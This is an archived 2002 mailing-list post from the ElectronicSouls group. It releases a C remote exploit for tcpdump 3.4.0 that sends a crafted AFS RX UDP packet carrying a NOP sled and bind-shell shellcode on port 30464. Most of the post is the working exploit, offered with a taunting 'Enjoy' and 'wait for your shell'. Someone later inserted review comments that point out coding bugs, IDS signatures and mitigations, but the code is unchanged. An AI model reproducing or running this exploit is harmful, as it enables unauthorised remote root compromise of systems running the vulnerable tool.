 
Message-ID: <200211290811.gAT8Bjx6062354@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - tcpdump exploit

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We are releasing this for political reasons.  We don't need to backdoor
tcpdump to get root on you, like those scriptkiddies do; we can find
our own bugs to exploit from mailing lists and then write our exploits.

Enjoy.

# cat  ES-tcpdump-xp-not-finished.c
   /*
    * MAD PRIVATE !%&#*
    * Linux x86 Tcpdump 3.4.0 (maybe others!) Remote Exploit (with -s 500 or higher)
    * (C) BrainStorm - ElectronicSouls - \x45\x53 0wnez ;)
    * DO NOT DISTRIBUTE !
    */

    #include <stdio.h>
    #include <netinet/in.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netdb.h>
    #include <arpa/inet.h>

    /*
     * Payload tuning values, taken as given in the listing and not verified:
     * ADDR plus the optional command-line offset is the return address that
     * main() repeats NUM_ADDR times in the datagram, followed by NUM_NOP
     * bytes of NOP (0x90).
     */
    #define ADDR                    0xbffff248
    #define OFFSET                  0
    #define NUM_ADDR                10
    #define NOP                     0x90
    #define NUM_NOP                 100

    /* RX/AFS protocol constants used to shape the single UDP datagram sent by main(). */
    #define RX_CLIENT_INITIATED     1
    #define RX_PACKET_TYPE_DATA     1
    #define FS_RX_DPORT             7000
    #define FS_RX_SPORT             7001
    #define AFS_CALL                134

    /*
     * RX packet header as this listing lays it out: five 32-bit words, four
     * single bytes and two 16-bit fields (28 bytes with natural alignment and
     * no padding). main() overlays it on the start of `buffer` and sets only
     * type, seq and flags; every other field is left zero by the memset.
     */
    struct rx_header
    {
        u_int32_t epoch;
        u_int32_t cid;
        u_int32_t callNumber;
        u_int32_t seq;
        u_int32_t serial;
        u_char type;
        u_char flags;
        u_char userStatus;
        u_char securityIndex;
        u_short spare;
        u_short serviceId;
    };

    /*
     * Opaque x86 machine-code payload; the author describes it as a bind
     * shell on port 30464. main() patches shellcode[30] and then copies
     * strlen() bytes of it, i.e. up to the first zero byte (as printed, the
     * sequence contains none). The bytes are not decoded or verified here;
     * from a defender's side they are best treated as a detection indicator.
     */
    char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
    "\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
    "\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
    "\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
    "\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
    "\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
    "\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
    "\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
    "\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
    "\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
    "\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
    "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
    "\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";

    /*
     * Resolve a dotted-quad string or a host name to an IPv4 address in
     * network byte order. On a gethostbyname() failure it prints a message
     * and terminates the process with exit(-1) instead of returning.
     *
     * Review notes (code left byte-for-byte):
     *  - inet_addr() yields an unsigned 32-bit value; comparing it, stored in
     *    a `long`, against -1 only works where long is 32 bits. On an LP64
     *    host the gethostbyname() fallback is never reached and the
     *    all-ones value is returned as if it were an address.
     *  - exit() and memcpy() are used without their declaring headers
     *    (implicit declarations, rejected by C99 and later compilers).
     *  - only the first 4 bytes of h_addr are copied; h_addrtype and
     *    h_length are not checked.
     */
    long resolve(char *name)
    {
     struct hostent *hp;
     long ip;

     if ((ip=inet_addr(name))==-1) {      /* -1 here assumes 32-bit long */
     if ((hp=gethostbyname(name))==NULL) {
     fprintf (stderr,"Can't resolve host name [%s].\n",name);
     exit(-1);
     }
     memcpy(&ip,(hp->h_addr),4);          /* first address only, 4 bytes assumed */
     }
     return(ip);
    }

    /*
     * Entry point: builds one UDP datagram shaped like an AFS RX DATA packet,
     * sends it to <host>:FS_RX_DPORT from local port FS_RX_SPORT, and exits.
     * argv[1] is the target host (dotted quad or name, see resolve()); the
     * optional argv[2] is added to ADDR to form the address repeated in the
     * payload. The layout written into `buffer` is, in order: rx_header,
     * five big-endian 32-bit words, "1 0\n", 120 'A' bytes, NUM_ADDR copies
     * of return_addr (host byte order, native `long` width), NUM_NOP NOP
     * bytes, the shellcode, and " 1\n". The first 520 bytes are sent.
     *
     * Defensive reading: on the wire this is an RX DATA packet to UDP/7000
     * from source port 7001 whose body holds a long run of 0x41 followed by
     * a run of 0x90, which is a usable IDS signature. The author's header
     * says it only matters when tcpdump 3.4.0 decodes AFS with a snaplen of
     * 500 or more; running capture tools unprivileged (or with tcpdump's -Z
     * privilege drop) and on a release whose changelog confirms the AFS fix
     * limits the impact.
     *
     * Review notes (code left byte-for-byte):
     *  - exit, atoi, memset, memcpy, strlen and close are called without
     *    their declaring headers (implicit declarations, rejected by C99 and
     *    later compilers); the listing is not self-contained.
     *  - sendto() is passed &addr without the (struct sockaddr *) cast that
     *    bind() uses; "%#x" is given a long.
     *  - return_addr is written through `long int *` without htonl(), so the
     *    offsets described above only hold for a 32-bit little-endian build.
     */
    int main (int argc, char *argv[]) {

     struct sockaddr_in addr,sin;
     int sock,aux, offset=OFFSET;
     char buffer[4048], *chptr;
     struct rx_header *rxh;
     long int *lptr, return_addr=ADDR;


     fprintf(stderr,"\n\n [ E l e c t r o n i c S o u l s ] \n");
     fprintf(stderr,"Tcpdump 3.4.0 Remote Exploit by BrainStorm\n\n");

     if (argc<2)
     {
     printf("Usage: %s <host> [offset]\n",argv[0]);
     exit(-1);
     }

     if (argc==3) offset=atoi(argv[2]);   /* optional argv[2] shifts the guessed address */
     return_addr+=offset;
     fprintf(stderr,"[+] Using return addr: %#x\n",return_addr);   /* %#x with a long: format mismatch */

     addr.sin_family=AF_INET;
     addr.sin_addr.s_addr=resolve(argv[1]);
     addr.sin_port=htons(FS_RX_DPORT);

     if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0)
     {
     perror("socket()");
     exit(-1);
     }
     /* bind the local end to the fixed source port FS_RX_SPORT */
     sin.sin_family=AF_INET;
     sin.sin_addr.s_addr=INADDR_ANY;
     sin.sin_port=htons(FS_RX_SPORT);

     if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
     perror("bind()");
     exit(-1);
     }
     memset(buffer,0,sizeof(buffer));   /* bytes not written below are sent as zeros */

     /* only type, seq and flags are set; the other header fields stay zero */
     rxh=(struct rx_header *)buffer;
     rxh->type=RX_PACKET_TYPE_DATA;
     rxh->seq=htonl(1);
     rxh->flags=RX_CLIENT_INITIATED;

     /* five 32-bit words in network byte order follow the header */
     lptr=(long int *)(buffer+sizeof(struct rx_header));

     *(lptr++)=htonl(AFS_CALL);
     *(lptr++)=htonl(1);
     *(lptr++)=htonl(2);
     *(lptr++)=htonl(3);
     *(lptr++)=htonl(420);

     chptr=(char *)lptr;
     sprintf(chptr,"1 0\n");   /* also writes a NUL as 5th byte; the memset below overwrites it */
     chptr+=4;

     memset(chptr,'A',120);
     chptr+=120;

     lptr=(long int *)chptr;

     /* no htonl(): written in host order and at native long width */
     for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
     chptr=(char *)lptr;

     memset(chptr,NOP,NUM_NOP);
     chptr+=NUM_NOP;

     shellcode[30]=(char)(46);   /* patches one payload byte; the meaning of 46 is not stated in the listing */

     memcpy(chptr,shellcode,strlen(shellcode));
     chptr+=strlen(shellcode);

     sprintf(chptr," 1\n");

     /* fixed length of 520 bytes regardless of how much of buffer was filled */
     if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1)
     {
     perror("send()");
     exit(-1);
     }
     fprintf(stderr,"Overflow sent, now wait for your shell =) ..\n\n");
     close(sock);
     return(0);
    }

#

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"Winner of the Best Eyes Award"

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nIU8MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltGnYAnRPF4oJBlaU0
2AGLKlLdTNrRinezAJ9EpWGLb2K8esivw+01R5LKf4mCxQ==
=Bh2L
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427
